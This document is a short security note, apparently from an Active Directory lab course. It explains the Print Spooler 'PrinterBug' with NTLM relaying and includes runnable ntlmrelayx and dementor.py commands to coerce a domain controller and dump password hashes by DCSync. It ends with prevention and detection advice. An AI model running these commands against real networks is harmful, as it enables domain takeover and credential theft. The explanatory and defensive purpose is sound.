Print Spooler & NTLM Relaying
Print Spooler is an old service enabled by default on Windows systems (even latest versions).
PrinterBug (found in 2018) abuses Print Spooler to force a remote machine to authenticate elsewhere, sending a TGT (ticket-granting ticket).
Microsoft won't fix this—it's "by design."
If Print Spooler is enabled on a Domain Controller (DC), an attacker can:
Relay the connection to another DC and perform DCSync (dump user hashes).
Connect to a machine with Unconstrained Delegation (UD) – extract TGTs from memory (with Rubeus/Mimikatz).
Abuse AD CS – get a certificate for the DC, impersonate it.
Abuse Resource-Based Kerberos Delegation – authenticate as any admin.
Attack
Pre-condition: SMB Signing must be disabled on the target DC.
Step 1: Start NTLMRelayx to relay to the second Domain Controller.
impacket-ntlmrelayx -t dcsync://<DC2_IP> -smb2support
Step 2: Trigger the PrinterBug from a compromised user.
python3 dementor.py <victim_DC_IP> <attacker_IP> -u <username> -d <domain> -p <password>python3 ./dementor.py 172.16.18.20 172.16.18.3 -u bob -d eagle.local -p Slavi123
Step 3: Wait for NTLMRelayx to catch the connection and perform DCSync.
Result: You receive user password hashes from the second DC.
Prevention
Disable Print Spooler on all non-printing servers (especially DCs).
Or block remote calls via registry:
RegisterSpoolerRemoteRpcEndPoint = 2(disables remote access)
Detection
No specific logs for this, but:
Monitor logons from core servers
Correlate with unexpected IP addresses
Look for successful logons from Kali machine IP
Honeypot
Block outbound 139/445 from DCs using firewall.
This prevents reverse connection but alerts you if the bug is triggered.
⚠️ Only for mature environments, since unknown bugs could bypass this.
Last updated